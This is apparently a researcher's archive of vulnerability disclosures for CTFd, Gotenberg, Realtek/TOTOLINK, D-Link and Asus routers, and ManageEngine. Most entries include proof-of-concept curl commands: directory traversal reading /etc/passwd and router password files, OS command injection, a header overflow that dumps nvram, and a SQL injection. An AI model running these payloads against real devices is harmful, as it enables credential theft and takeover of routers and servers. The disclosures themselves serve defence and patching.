Multiple vulnerabilities in CTFd versions <= 3.7.4 allows a remote attacker who acquired user’s activation or password reset link (e.g. from browser history) to hijack victim’s account. Other vulnerability allows the user to pass access control and change an already set bracket.
Product name: CTFd
Website: https://ctfd.io
Product description: CTFd is a Capture The Flag framework focusing on ease of use and
customizability. It comes with everything you need to run a CTF and it’s easy
to customize with plugins and themes.
CVE-2024-11716
CTFd (https://ctfd.io) versions <= 3.7.4
5.3 Medium (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)
CTFd offers scoreboard bracket function where users can be assigned to a bracket and are scoring is grouped by brackets. The function allows the user to pick a bracket once at start. It seems the logic’s intention is to not allow the user to change the bracket when it was already assigned:
195 @pre_load
196 def validate_bracket_id(self, data):
197 bracket_id = data.get("bracket_id")
198 if bracket_id is None:
199 return
200
201 current_user = get_current_user()
202 if is_admin():
203 bracket = Brackets.query.filter_by(id=bracket_id, type="users").first()
204 if bracket is None:
205 ValidationError(
206 "Please provide a valid bracket id", field_names=["bracket_id"]
207 )
208 else:
209 if (
210 current_user.bracket_id == int(bracket_id)
211 or current_user.bracket_id is None
212 ):
213 bracket = Brackets.query.filter_by(id=bracket_id, type="users").first()
214 if bracket is None:
215 ValidationError(
216 "Please provide a valid bracket id", field_names=["bracket_id"]
217 )
218 else:
219 raise ValidationError(
220 "Please contact an admin to change your bracket",
221 field_names=["bracket_id"],
222 )
Please note in lines 210-211 the code verifies if user has changed the bracket_id and if so raises an error stating that only administrator can do so.
This validation suggests the system treats this as a security control and does not allow to switch brackets. Some setups/deployments might assume trust to this function.
The user can however bypass the check by:
First saving user details with bracket_id=null - GUI blocks this but API allows according to line 198. E.g.
curl 'http://ctfd/api/v1/users/me' --H 'Content-Type: application/json' \
-H 'Content-Type: application/json' -H "CSRF-Token: $CSRF" \
--data-raw '{"name":"test","email":"t@t.pl","bracket_id":null,"fields":[]}'
Second saving again with the proper changed bracket_id - this will be allowed according to line 211. This can be done normally in GUI.
Some contests can use the scoreboard bracket system to group users into different prize pools. Having the possibility to change the bracket might end up with cheating and getting the prize.
It should not be possible to change an already set bracket to null and this should be verified in the API (backend) OR (if the security control is simply wrong) there should be no ValidationError in order not to confuse CTFd implementers.
Fixed in: https://github.com/CTFd/CTFd/pull/2636
CVE-2024-11717
CTFd (https://ctfd.io) versions <= 3.7.4
6.3 Medium (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N)
CTFd uses the “itsdangerous” python package for creating activation and password reset tokens. In both cases it is done by signing user’s e-mail address with timestamp with the system’s secret_key.
The generated token is directly used in URL sent to the user over e-mail. During token validation, in both activation and password reset, the system is checking if the HMAC signature is correct and if the token was not created more than 1800s (30min) ago. Then the system verifies if the signed value matches any user’s e-mail address. The matched user is being either activated or setting new password is being permitted.
The tokens for both use cases have exactly the same construction and can be used interchangeably. Particularly, activation token can be used in reset password function which is pretty dangerous especially when the user registers and the token was used in GET request what means it can be stored in many places - browser’s history, proxy access logs, and so on. An attacker gaining access to such token within the expiration time can use it to gain control of the victim’s account.
Connected with the vulnerability #3 the impact is even more visible as the token can be reused many times and cannot be revoked by the user until it expires.
The described above mechanism of token generation is stateless. This means tokens are not single-use and can be used withing the expiration timeout (30min) multiple times.
Tokens sent in URL can be stored in many places - e-mail, browser’s history, proxy access logs and so on. An attacker gaining access to such token within the expiration time can use it to gain control of the victim’s account.
The tokens for resetting password and activating account have base64 encoded email address of the user in plain text. They are opened via GET requests which means can be stored in many places and thus may leak user’s email address.
High school and university students are encouraged to participate in a CTF. They read this info on classes and are registering to the CTF using a university/school computer (e.g. during classes).
The attack does not depend on email access:
To fix all 3 vulnerabilities it would be good to change the tokens to random numbers (no email) stored in Redis cache and use keys distinguishing the action type (activation vs reset password). After usage the token can be removed from Redis thus making the tokens single-use.
Fixed in: https://github.com/CTFd/CTFd/pull/2679
Special thanks to Kevin Chung (ColdHeat) from CTFd for fast response and fixes.
Author: Blazej Adamczyk (br0x) https://sploit.tech/
Team: Efigo https://efigo.pl/
]]>Taking the following CVEs together: CVE-2020-13449, CVE-2020-13450, CVE-2020-13451, we’re getting a full attack leading to unauthenticated RCE.
CVSSv3.1 chained score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A)
Write-up: write-up at medium.com
Exploit code: https://github.com/br0xpl/gotenberg_hack
Video:
CVE: CVE-2020-13449
Vendor: https://www.thecodingmachine.com
Product: Gotenberg (https://github.com/thecodingmachine/gotenberg)
Version: <=6.2.1
Description: Directory traversal vulnerability in Markdown engine of Gotenberg version 6.2.1 and lower allows unauthorized attacker to read any container files.
PoC:
Create index.html file:
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>My PDF</title>
</head>
<body>
<pre style="white-space: pre-wrap;">
Path:
{{ .DirPath }}
PASSWD:
{{ toHTML .DirPath "../../../../etc/passwd" }}
IP:
{{ toHTML .DirPath "../../../../proc/net/fib_trie" }}
TCP:
{{ toHTML .DirPath "../../../../proc/net/tcp" }}
env:
{{ toHTML .DirPath "../../../../proc/self/environ" }}
</pre>'
</body>
</html>
Call markdown endpoint:
$ curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html \
-o result.pdf --header 'Content-Type: multipart/form-data'
CVE: CVE-2020-13450
Vendor: https://www.thecodingmachine.com
Product: Gotenberg (https://github.com/thecodingmachine/gotenberg)
Version: <=6.2.1
Description: Directory traversal vulnerability in file upload function of Gotenberg version 6.2.1 and lower allows unauthorized attacker to upload and overwrite any writeable files outside the desired folder.
This can lead to DoS, change program behaviour or even to code execution (see CVE-2020-13451).
PoC:
curl 'http://$URL_GOTENBERG/convert/markdown' --form files=@index.html \
--form "files=@tini;filename=../../../tini" -o res.pdf\
--header 'Content-Type: multipart/form-data'
CVE: CVE-2020-13451
Vendor: https://www.thecodingmachine.com
Product: Gotenberg (https://github.com/thecodingmachine/gotenberg)
Version: <=6.2.0
Description: Incomplete cleanup vulnerability in Office rendering engine of Gotenberg version 6.2.1 and lower allows unauthorized attacker (using a different vulnerability like CVE-2020-13450) to overwrite libreoffice config (profile) files and execute arbitrary code using macros.
Gotenberg creates libreoffice profile when office endpoint is called in tmp choosing a folder with a name based on random ephemeral port number chosen by kernel. What is most important after finishing request the profile folder is not removed. Thus using a file upload vulnerability like the one described in CVE-2020-13450 an attacker can modify the profile preparing a macro which is going to be executed next time the same random profile will be reused.
Analyzing kernel sources, in default kernel config, there will be about 7054 different ports choosen at random. The hack requires to retry many times but works reliably.
Exploit code: https://github.com/br0xpl/gotenberg_hack
CVE: CVE-2020-13452
Vendor: https://www.thecodingmachine.com
Product: Gotenberg (https://github.com/thecodingmachine/gotenberg)
Version: <=6.2.1
Description: Insecure permissions of /tini (writeable by user gotenberg) file potentially allows an attacker to overwrite the file what can lead to Deny of Service or even code execution.
| Author: Blazej Adamczyk | https://sploit.tech/ |
Team: Efigo https://efigo.pl/
]]>Exploiting all the vulnerabilities together allows a remote
unauthenticated attacker to execute any code with root permissions
and reveal administration password.
CVSS v3 socre: 9.6 AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
(assuming Administrative Access on WAN is enabled the score is 10.0)
Video:
Impact: Quick statistical analysis (using indexing engines) showed
that there are 700 000 devices which are using Boa in the mentioned
version. A test on a large sample (70 000+) revealed that in the
sample 10% are vulnerable devices. This means that statistically
there are around 70 000 vulnerable devices accessible from the Internet.
Exploit: As there are so many vulnerable devices I’m publishing the exploit code in order to draw more attention to the potential impact here.
I kindly ask to spread information about the threat to make the users aware of the problem.
Temporary workaround: Unfortunately I did not get any good information from real vendors like TOTOLINK and for now I would suggest to disable administration interface from WAN and restricting LAN router administration interface access using some kind of firewall if possible.
Limitations: The only thing that is needed is the access to router administration interface (either access to local network or Administrative Access on WAN enabled).
CVE: CVE-2019-19822
SDK vendor: Realtek
Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc., MAX-C300N, T-BROAD and possibly others..
Product: Realtek SDK based routers backed by Boa HTTP server (and possibly others) and using apmib library for memory management.
Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15
Description: Realtek SDK based routers which use form based instead HTTP Basic authentication (that includes Realtek APMIB 0.11f and Boa HTTP server 0.94.14rc21) allows remote attackers to retrieve the configuration, including sensitive data (usernames and passwords).
This affects:
Technical details: The apmib library at some point of initialization dumps the whole memory contents the file /web/config.dat. This folder is actually used by the boa http server as index directory. Additionally if the router is configured for form-based authentication the access control verifies credentials only for some URLs but “.dat” files are not restricted. This issue does not affect routers which use HTTP Basic authentication to secure all URLs.
PoC:
$ curl http://routerip/config.dat
CVE: CVE-2019-19823
SDK vendor: Realtek
Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc., MAX-C300N, T-BROAD and possibly others..
Product: Realtek SDK based routers backed by Boa HTTP server (and possibly others) and using apmib library for memory management.
Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15
Description: Realtek SDK based routers (that includes Realtek APMIB 0.11f and Boa HTTP server 0.94.14rc21) store passwords in plaintext.
This affects:
Technical details: Data stored in memory in COMPCS (apmib library) format contains device administration and other passwords in plaintext. The apmib library additionally at some point of initialization dumps the whole memory contents the file /web/config.dat which might be used to easily retrieve user passwords.
CVE: CVE-2019-19824
Vendor: TOTOLINK
Product: TOTOLINK Realtek SDK based routers
Boa Version: <= Boa/0.94.14rc21
Description: On several Realted SDK based TOTOLINK routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device’s internals.
This affects:
PoC:
$ curl 'http://target/boafrm/formSysCmd' --user "admin:password"
--data 'submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&
save_apply=Run+Command&sysCmd=cp%20%2Fetc%2Fpasswd%20%2Fweb%2Fxxxx.dat'
CVE: CVE-2019-19825
Vendor: TOTOLINK
Product: TOTOLINK Realtek SDK based routers
Boa Version: <= Boa/0.94.14rc21
Description: Guessable captcha vulnerability (CWE-804) in several series of TOTOLINK routers allows a remote attacker to automatically login to the router without reading and providing real captcha.
The following command returns captcha in plain text:
$ curl 'http://target/boafrm/formLogin' --data '{"topicurl":"setting/getSanvas"}'
Additionally by using the HTTP Basic in a HEADER the attacker can execute router actions without providing captcha at all.
This affects:
Credit: Blazej Adamczyk (br0x)
]]>CVE: CVE-2018-10822
CVSS v3: 8.6
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Description: Directory traversal vulnerability in the web interface on D-Link routers:
allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.
PoC:
$ curl http://routerip/uir//etc/passwd
The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.
This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.
CVE: CVE-2018-10824
Description:
An issue was discovered on D-Link routers:
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822
$ curl http://routerip/uir//tmp/XXX/0
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
Taking all the three together it is easy to gain full router control including arbitrary code execution.
Suggested CVSS v3 for all three (1-3): 10.0
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Video:
Timeline:
ALERT! Users having routers not upgradable from 3.0.0.4.376.* or less
should CLOSE the http from WAN and should restrict the access to
management port from LAN as well!
CVE: CVE-2017-15655
CVSS v3: 9.6
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
(Administrator needs to login and
visit certain page at the router website)
Description:
This vulnerability affects new Asus routers with not up-to-date firmware, as well as some older end-of-life routers (e.g. RT-N65R, RT-N65U)
Multiple buffer overflow vulnerabilities in HTTPd server in Asus asuswrt version <=3.0.0.4.376.X. All have been fixed in version 3.0.0.4.378, but this vulnerability was not previously disclosed. Some end-of-life routers have this version as the newest so are vulnerable at this time. This vulnerability allows for RCE with administrator rights when the administrator visits serveral pages.
For example the “Host:” header is vulnerable and allows to override the SystemCmd variable which then allows for RCE when the administrator visits serveral pages (for example the network tools router tab).
PoC (after running this script, when the administrator visists one of several pages which trigger commands e.g. the network tools tab, the script is being run and outputs the contents of nvram to a css file which can be retrived without authentication)
$ curl 'http://routerIP:8080' -H "Host: xxxxxxxxxxxxxx $(for i in $(seq 1 9700); do echo -n " "; done) \$(nvram show > /www/user/nvram.css )"Timeline:
Video:
]]>CVE: CVE-2017-15654
CVSS v3: 8.3
AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
(Attacker needs administrator interaction and a way to overcome administrator IP check - see next point)
Description: The session token is generated for an authenticated user using stdlib rand function. The token generation code looks as follows:
char *generate_token(void){
int a=0, b=0, c=0, d=0;
//char create_token[32]={0};
memset(gen_token,0,sizeof(gen_token));
srand (time(NULL)); //VULNERABLE
a=rand();
b=rand();
c=rand();
d=rand();
snprintf(gen_token, sizeof(gen_token),"%d%d%d%d", a, b, c, d);
return gen_token;
}The code initializes the random number generator each time a token is generated with router epoch time.
An attacker can guess a token knowing more or less the time the administrator has logged in.
Timeline:
CVE: CVE-2017-15653
CVSS v3: 8.3
AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
(Attacker needs the session token to execute any action without IP check - see point above)
Description: An attacker who knows the session token can walkaround the IP verification mechanism by sending requests with a special useragent.
The following PoC will download current router configuration even if issued from a different than the logged user IP address:
curl "http://ROUTERADDRESS/s.CFG" -H "Cookie: asus_token=TOKEN" -H 'User-Agent: asusrouter-asusrouter-asusrouter-asusrouter'Timeline:
CVE: CVE-2017-15656
Description: Asus routers store password in plain text in NVRAM memory. Executing nvram show, or downloading the backup file and decoding it allows anyone to read the administrator password.
Having access to telnet (shell) one can execute:
nvram showFor reading password from backup file see the exploit below.
Timeline:
An unauthenticated attacker can retrieve information about a logged-in session (if and who [IP address] is currently logged in). This itself is not a vulnerability but together with the two previous it allows for a easy exploit.
curl "http://ROUTERADDRESS/Nologin.asp"Taking all the four together it is easy to gain router access by waiting for an administrator login and retrieving the login/password using his token. Finally it is possible to download the backup file and read the administrator login and password. A ready script is attached to this message.
Suggested CVSS v3 for all three (1-3): 9.6
AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Video:
Exploit: asuswrt.tar.gz
]]>CVSS v3: 9.9
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description: An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to the SQLAdvancedALSearchResult.cc. The SQL query is build manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.
The problem is with escaping the operator when more then one condition is specified in the advanced search.
PoC:
$ curl https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP
Video:
Timeline:
References: I wrote an article about “zero-knowledge” secret management systems to compare different existing password managers and give guidance on how to choose a really secure password management software:
Adamczyk Błażej. Secure and convenient secret management in distributed computer systems, 2016. WSEAS TRANSACTIONS ON COMPUTERS, vol. 15, no. 2016, pp. 327-333, Full text